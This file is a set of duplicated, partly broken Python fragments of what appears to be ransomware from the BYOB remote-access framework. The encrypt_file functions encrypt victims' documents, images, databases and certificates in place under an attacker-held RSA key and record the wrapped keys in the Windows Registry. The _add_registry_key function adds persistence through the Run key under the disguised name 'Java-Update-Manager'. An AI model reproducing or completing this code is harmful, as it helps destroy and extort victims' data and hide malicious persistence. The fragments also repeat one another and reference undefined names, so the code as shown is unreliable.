def encrypt_file(path):
"""
Encrypt a file
"""
try:
if not os.path.isfile(path) or not os.path.splitext(path)[1] in [
'.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg',
'.jpeg', '.png', '.img', '.gif', '.mp3', '.mp4', '.mpeg',
'.mov', '.avi', '.wmv', '.rtf', '.txt', '.html', '.php', '.js',
'.css', '.odt', '.ods', '.odp', '.odm', '.odc', '.odb', '.doc',
'.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb',
'.xlk', '.ppt', '.pptx', '.pptm', '.mdb', '.accdb', '.pst',
'.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf',
'.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpg',
'.jpe', '.jpg', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay',
'.crw', '.cr2', '.dcr', '.kdc', '.erf', '.mef', '.mrw', '.nef',
'.nrw', '.orf', '.raf', '.raw', '.rwl', '.rw2', '.r3d', '.ptx',
'.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx',
'.p12', '.p7b', '.p7c', '.tmp', '.py', '.php', '.html', '.css',
'.js', '.rb', '.xml'
]:
return
aes_key = Crypto.Hash.MD5.new(Crypto.get_random_bytes(16)).hexdigest()
with open(path, 'rb') as fp:
plaintext = fp.read()
ciphertext = crypto.encrypt_aes(plaintext, key)
with open(path, 'wb') as fd:
fd.write(ciphertext)
cipher = Crypto.Cipher.PKCS1_OAEP.new(publickey)
key = base64.b64encode(cipher.encrypt(aes_key))
util.registry_key(r'SOFTWARE\BYOB', path, key)
util.debug('{} encrypted'.format(path))
except Exception as e:
util.debug("{} error: {}".format(encrypt.func_name, str(e)))
def encrypt_file(filename, rsa_key):
"""
Encrypt a file with AES-256-OCB symmetric encryption
using a randomly generated key, encrypt the key
with RSA-2048 asymmetric encryption, then store the
filename and RSA-encrypted AES-key as a key in the
Windows Registry
`Requires`
:param str filename: target filename
:param RsaKey rsa_key: 2048-bit public RSA key
Returns True if succesful, otherwise False
"""
try:
if os.path.isfile(filename):
if os.path.splitext(filename)[1] in globals()['filetypes']:
if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey):
cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key)
aes_key = os.urandom(32)
with open(filename, 'rb') as fp:
data = fp.read()
ciphertext = encrypt_aes(data, aes_key)
with open(filename, 'wb') as fd:
fd.write(ciphertext)
key = base64.b64encode(cipher.encrypt(aes_key))
util.registry_key(globals()['registry_key'], filename, key)
util.log('{} encrypted'.format(filename))
return True
else:
util.log("File '{}' not found".format(filename))
except Exception as e:
util.log("{} error: {}".format(encrypt_file.func_name, str(e)))
return False
def encrypt_file(filename, rsa_key):
"""
Encrypt a file with AES-256-OCB symmetric encryption
using a randomly generated key, encrypt the key
with RSA-2048 asymmetric encryption, then store the
filename and RSA-encrypted AES-key as a key in the
Windows Registry
`Requires`
:param str filename: target filename
:param RsaKey rsa_key: 2048-bit public RSA key
Returns True if succesful, otherwise False
"""
try:
if os.path.isfile(filename):
if os.path.splitext(filename)[1] in globals()['filetypes']:
if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey):
cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key)
aes_key = os.urandom(32)
with open(filename, 'rb') as fp:
data = fp.read()
ciphertext = encrypt_aes(data, aes_key)
with open(filename, 'wb') as fd:
fd.write(ciphertext)
key = base64.b64encode(cipher.encrypt(aes_key))
util.registry_key(globals()['registry_key'], filename, key)
util.log('{} encrypted'.format(filename))
return True
else:
util.log("File '{}' not found".format(filename))
except Exception as e:
util.log("{} error: {}".format(encrypt_file.__name__, str(e)))
return False
def encrypt_file(filename, rsa_key):
"""
Encrypt a file with AES-256-OCB symmetric encryption
using a randomly generated key, encrypt the key
with RSA-2048 asymmetric encryption, then store the
filename and RSA-encrypted AES-key as a key in the
Windows Registry
`Requires`
:param str filename: target filename
:param RsaKey rsa_key: 2048-bit public RSA key
Returns True if succesful, otherwise False
"""
try:
if os.path.isfile(filename):
if os.path.splitext(filename)[1] in [
'.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg',
'.jpeg', '.png', '.img', '.gif', '.mp3', '.mp4', '.mpeg',
'.mov', '.avi', '.wmv', '.rtf', '.txt', '.html', '.php',
'.js', '.css', '.odt', '.ods', '.odp', '.odm', '.odc',
'.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx',
'.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx', '.pptm', '.mdb',
'.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf',
'.wb2', '.mdf', '.dbf', '.psd', '.pdd', '.pdf', '.eps',
'.ai', '.indd', '.cdr', '.jpg', '.jpe', '.jpg', '.dng',
'.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2',
'.dcr', '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw',
'.orf', '.raf', '.raw', '.rwl', '.rw2', '.r3d', '.ptx',
'.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem',
'.pfx', '.p12', '.p7b', '.p7c', '.tmp', '.py', '.php',
'.html', '.css', '.js', '.rb', '.xml', '.py', '.pyc',
'.wmi', '.sh', '.spec', '.asp', '.aspx', '.plist', '.json',
'.sql', '.vbs', '.ps1'
]:
if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey):
cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key)
aes_key = Crypto.Random.get_random_bytes(32)
with open(filename, 'rb') as fp:
data = fp.read()
ciphertext = security.encrypt_aes(data, aes_key)
with open(filename, 'wb') as fd:
fd.write(ciphertext)
key = base64.b64encode(cipher.encrypt(aes_key))
util.registry_key(globals()['_registry_key'], filename,
key)
util.debug('{} encrypted'.format(filename))
return True
else:
_debugger.debug("File '{}' not found".format(filename))
except Exception as e:
_debugger.debug("{} error: {}".format(encrypt_file.func_name, str(e)))
return False
def _add_registry_key(value=None, name='Java-Update-Manager'):
try:
if os.name == 'nt' and not _methods['registry_key'].established:
value = sys.argv[0]
if value and os.path.isfile(value):
try:
util.registry_key(r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", name, value)
return (True, name)
except Exception as e:
util.log('{} error: {}'.format(_add_registry_key.__name__, str(e)))
except Exception as e:
util.log('{} error: {}'.format(_add_registry_key.__name__, str(e)))
return (False, None)
def _add_registry_key(value=None, name='Java-Update-Manager'):
try:
if os.name == 'nt' and not _methods['registry_key'].established:
value = sys.argv[0]
if value and os.path.isfile(value):
try:
util.registry_key(r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", name, value)
return (True, name)
except Exception as e:
util.log('{} error: {}'.format(_add_registry_key.func_name, str(e)))
except Exception as e:
util.log('{} error: {}'.format(_add_registry_key.func_name, str(e)))
return (False, None)
def encrypt_files(args):
try:
if os.path.splitext(path)[1] in [
'.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg',
'.jpeg', '.png', '.img', '.gif', '.mp3', '.mp4', '.mpeg',
'.mov', '.avi', '.wmv', '.rtf', '.txt', '.html', '.php', '.js',
'.css', '.odt', '.ods', '.odp', '.odm', '.odc', '.odb', '.doc',
'.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb',
'.xlk', '.ppt', '.pptx', '.pptm', '.mdb', '.accdb', '.pst',
'.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf',
'.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpg',
'.jpe', '.jpg', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay',
'.crw', '.cr2', '.dcr', '.kdc', '.erf', '.mef', '.mrw', '.nef',
'.nrw', '.orf', '.raf', '.raw', '.rwl', '.rw2', '.r3d', '.ptx',
'.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx',
'.p12', '.p7b', '.p7c', '.tmp', '.py', '.php', '.html', '.css',
'.js', '.rb', '.xml'
]:
aes_key = Crypto.Hash.MD5.new(
Crypto.Ransom.get_random_bytes(16)).hexdigest()
ransom = encrypt_file(path, key=aes_key)
cipher = Crypto.Cipher.PKCS1_OAEP.new(ransom.pubkey)
key = base64.b64encode(cipher.encrypt(aes_key))
util.registry_key(ransom, path, key)
util.debug('{} encrypted'.format(path))
if not len([
k for k in workers if 'encrypt-files' in k
if workers[k].is_alive()
]):
rnd = random.randint(1, 100)
workers['encrypt-files-{}'.format(rnd)] = threading.Thread(
target=threader, args=(jobs, ), name=time.time())
workers['encrypt-files-{}'.format(rnd)].daemon = True
workers['encrypt-files-{}'.format(rnd)].start()
except Exception as e:
util.debug("{} error: {}".format(_encrypt.func_name, str(e)))
